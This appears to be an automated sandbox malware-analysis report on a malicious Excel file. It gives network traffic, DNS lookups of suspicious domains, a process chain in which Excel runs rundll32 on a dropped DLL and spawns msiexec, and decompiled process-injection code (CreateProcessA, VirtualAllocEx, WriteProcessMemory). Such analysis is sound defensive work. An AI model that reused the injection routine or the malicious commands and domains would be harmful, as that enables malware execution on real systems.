Jan 26, 2021 21:25:20.769681931 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769702911 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769723892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769727945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769740105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769750118 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769773006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769776106 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769787073 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769803047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769825935 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769828081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769838095 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769851923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769856930 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769875050 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769898891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769898891 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769911051 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769921064 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769957066 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769958019 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769969940 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.770011902 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.771799088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.771826029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.771857023 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.771874905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.771878958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.771909952 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.771934032 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.771943092 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.771960020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.771975040 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.771989107 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.772005081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.772018909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.772030115 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.772068024 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.772075891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.779558897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.779587030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.779613018 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.779634953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.779656887 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.779661894 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.779669046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.779710054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.780846119 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.780879021 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.780916929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.780924082 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.780940056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.780972958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.780982971 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781013966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781039953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781048059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781059980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781095028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781121016 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781136990 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781153917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781178951 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781181097 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781214952 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781239033 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781256914 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781260014 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781301975 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781317949 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781346083 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781363010 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781409025 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781411886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781457901 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781471968 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781496048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781519890 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781536102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781543016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781586885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781603098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781630039 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781655073 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781667948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781673908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781708956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781735897 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781753063 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781755924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781790018 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781815052 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781832933 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781835079 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781867981 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781893969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781908989 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781917095 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781958103 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.781979084 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.781996012 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.782027006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.782036066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.782062054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.782078028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.782088041 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.782111883 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.782140017 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.782150030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.782159090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.782205105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.791526079 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:52.465711117 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:52.489204884 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:52.489664078 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:52.523055077 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:52.544765949 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:52.554582119 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:52.554636002 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:52.554649115 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:52.554670095 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:52.563110113 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:52.587434053 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:52.587462902 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:52.587569952 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:53.035223961 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:53.059767962 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:54.027487040 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:54.027533054 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:54.027714968 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:54.043426991 CET	49166	443	192.168.2.22	104.21.44.135
Jan 26, 2021 21:25:54.066041946 CET	443	49166	104.21.44.135	192.168.2.22
Jan 26, 2021 21:25:54.149837971 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.170892954 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.171060085 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.172697067 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.195552111 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.204755068 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.204780102 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.204914093 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.217333078 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.240657091 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.243583918 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.243807077 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.259028912 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.280167103 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.703918934 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.703946114 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.704092026 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.709074974 CET	49167	443	192.168.2.22	172.67.198.109
Jan 26, 2021 21:25:54.730235100 CET	443	49167	172.67.198.109	192.168.2.22
Jan 26, 2021 21:25:54.854219913 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:54.877010107 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:54.877115011 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:54.878859043 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:54.900859118 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:54.905291080 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:54.905309916 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:54.905400991 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:54.917448044 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:54.938692093 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:54.939711094 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:54.939775944 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:54.961987019 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:54.983095884 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:55.376746893 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:55.376776934 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:25:55.376959085 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:55.380744934 CET	49168	443	192.168.2.22	172.67.158.184
Jan 26, 2021 21:25:55.402208090 CET	443	49168	172.67.158.184	192.168.2.22
Jan 26, 2021 21:27:19.733809948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:27:19.756819010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:27:19.756984949 CET	49165	443	192.168.2.22	172.67.150.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 21:25:19.788542032 CET	52197	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:25:19.810256004 CET	53	52197	8.8.8.8	192.168.2.22
Jan 26, 2021 21:25:52.421648026 CET	53099	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:25:52.438337088 CET	53	53099	8.8.8.8	192.168.2.22
Jan 26, 2021 21:25:54.128047943 CET	52838	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:25:54.147412062 CET	53	52838	8.8.8.8	192.168.2.22
Jan 26, 2021 21:25:54.766288996 CET	61200	53	192.168.2.22	8.8.8.8
Jan 26, 2021 21:25:54.850646019 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 21:25:19.788542032 CET	192.168.2.22	8.8.8.8	0x2c09	Standard query (0)	rnollg.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:52.421648026 CET	192.168.2.22	8.8.8.8	0x9b74	Standard query (0)	gadgetswolf.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:54.128047943 CET	192.168.2.22	8.8.8.8	0xcc21	Standard query (0)	homesoapmolds.com	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:54.766288996 CET	192.168.2.22	8.8.8.8	0x8798	Standard query (0)	govemedico.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 26, 2021 21:25:19.810256004 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	rnollg.com	172.67.150.228	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:19.810256004 CET	8.8.8.8	192.168.2.22	0x2c09	No error (0)	rnollg.com	104.21.11.254	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:52.438337088 CET	8.8.8.8	192.168.2.22	0x9b74	No error (0)	gadgetswolf.com	104.21.44.135	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:52.438337088 CET	8.8.8.8	192.168.2.22	0x9b74	No error (0)	gadgetswolf.com	172.67.200.147	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:54.147412062 CET	8.8.8.8	192.168.2.22	0xcc21	No error (0)	homesoapmolds.com	172.67.198.109	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:54.147412062 CET	8.8.8.8	192.168.2.22	0xcc21	No error (0)	homesoapmolds.com	104.21.60.169	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:54.850646019 CET	8.8.8.8	192.168.2.22	0x8798	No error (0)	govemedico.tk	172.67.158.184	A (IP address)	IN (0x0001)
Jan 26, 2021 21:25:54.850646019 CET	8.8.8.8	192.168.2.22	0x8798	No error (0)	govemedico.tk	104.21.73.69	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 26, 2021 21:25:19.879359007 CET	172.67.150.228	443	192.168.2.22	49165	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:25:19.879359007 CET	172.67.150.228	443	192.168.2.22	49165	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:25:52.554636002 CET	104.21.44.135	443	192.168.2.22	49166	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:25:52.554636002 CET	104.21.44.135	443	192.168.2.22	49166	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:25:54.204780102 CET	172.67.198.109	443	192.168.2.22	49167	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:25:54.204780102 CET	172.67.198.109	443	192.168.2.22	49167	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:25:54.905309916 CET	172.67.158.184	443	192.168.2.22	49168	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Thu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 26, 2021 21:25:54.905309916 CET	172.67.158.184	443	192.168.2.22	49168	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1252 Parent PID: 584

General

Start time:	21:24:39
Start date:	26/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f0e0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2392 Parent PID: 1252

General

Start time:	21:24:44
Start date:	26/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0xff2b0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2332 Parent PID: 2392

General

Start time:	21:24:44
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0xd10000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 1616 Parent PID: 2332

General

Start time:	21:25:12
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0x4e0000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 2332 Parent PID: 2392 rundll32.exeCOMMON

Executed Functions

Function 0084AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0084AE40(void* __eflags) {
				void* _v20;
				void* _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				intOrPtr _v110;
				char _v111;
				char _v125;
				signed int _v129;
				char _v130;
				void* _v134;
				char _v135;
				intOrPtr _v139;
				void _v140;
				char _v155;
				char _v179;
				void* _v712;
				char _v896;
				char _v1416;
				void* __ebx;
				void* __edi;
				void* _t76;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t94;
				int _t97;
				void* _t100;
				void* _t104;
				signed int _t107;
				int _t109;
				void* _t111;
				void _t112;
				void* _t119;
				int _t121;
				intOrPtr* _t123;
				int _t126;
				long _t128;
				int _t129;
				int _t136;
				void* _t137;
				signed int _t139;
				signed int _t148;
				void* _t150;
				struct _STARTUPINFOA* _t151;
				long _t152;
				void* _t153;
				CONTEXT* _t155;
				signed int _t157;
				void* _t159;
				signed int _t172;
				void* _t177;
				CHAR* _t178;
				long _t180;
				intOrPtr _t182;
				void* _t184;
				signed int _t185;
				void* _t196;
				void* _t207;
				signed int _t241;

				_t226 = __eflags;
				E008445B0(_t76, _t159, _t177, __eflags); // executed
				E00846C20(_t159, _t177, __eflags);
				E00846530(_t159, _t177, _t226);
				E00848660(_t159, _t177, _t226);
				E008478D0(_t159, _t177, _t226);
				E008466E0(_t159, _t177, _t226);
				_t188 = 0xffffffff;
				if(E0084D670() == 0) {
					return 0xffffffff;
				}
				E0085B180();
				_t228 =  *0x8637b0;
				if( *0x8637b0 == 0) {
					L19:
					E0084BF50(_t243, 0, E00849D50(0x638d6cbf));
					ExitProcess(0);
				}
				_t89 = E0084BF50(_t228, 0, E00849D50(0x6bae8bdb));
				_t196 = _t196 + 0xc;
				_t188 =  &_v1416;
				 *_t89( *0x8637b0,  &_v1416, 0x104);
				_t91 =  *0x8637b0; // 0x840000
				_t229 = _t91;
				_v32 = _t91;
				if(_t91 == 0) {
					goto L19;
				}
				_t151 =  &_v140;
				E00858F20(_t151, 0x44);
				_v140 = 0x44;
				_t94 = E0084D0A0( &_v179, 0x860b1b,  &_v179);
				_t178 =  &_v896;
				E0084C560(_t178, _t94, 0xffffffff);
				E0084BF50(_t229, 0, 0x1e16041);
				_t196 = _t196 + 0x24;
				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
				_t230 = _t97 - 1;
				if(_t97 != 1) {
					goto L19;
				}
				_t152 = E0084A820(_v32);
				E0084BF50(_t230, 0, 0x8cae838);
				_t196 = _t196 + 0xc;
				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
				_t231 = _t100;
				if(_t100 == 0) {
					goto L19;
				}
				 *0x862ca8 = _t100;
				_v24 = _t100;
				E0085FA60(_t178, _t231,  &_v1416);
				E008590E0(_t178);
				E0085FB20(_t178);
				_t104 = E00849D80(_v32, _t152); // executed
				_t188 = _t104;
				E00854660(_t104, _v32);
				E00849550(_t152, _t177, _v32, _t231, _t188, _v24);
				_t207 = _t196 + 0x1c;
				_t107 = E008576C0(_t231);
				_t180 = _t152;
				_v48 = _t107;
				if(_t152 == 0) {
					L8:
					_v28 = 0;
					E0084BF50(_t234, 0, 0xa48b0f9);
					_t196 = _t207 + 8;
					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
					_t235 = _t109 - 1;
					if(_t109 == 1) {
						_t188 = _t180;
						E0084BF50(_t235, 0, 0x8cae838);
						_t196 = _t196 + 8;
						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
						_t236 = _t111;
						if(_t111 != 0) {
							_t112 = E00847DD0(0x12);
							_t153 = _v24;
							_v140 = _t112;
							_v20 = _t111;
							_v139 = _t153;
							_v135 = E00847DD0(0x15);
							_v134 = _t188;
							_v130 = 0xb8;
							_v129 = _v48;
							E0084E930( &_v125, E0085D7E0( &_v28, _t177, 0x860962, 0xf,  &_v155), 0xe);
							_t182 = _v32;
							_v111 = 0xe9;
							E008422E0(_t236, E0084CA4E, _t182);
							_t119 = E00849D50(0x2e6222c1);
							_t184 = _v20;
							_v110 = 0xb66ea7e1 - _t182 + _t153 - _t184 + _t119;
							E0084BF50(_t236, 0, 0xa48b0f9);
							_t196 = _t196 + 0x34;
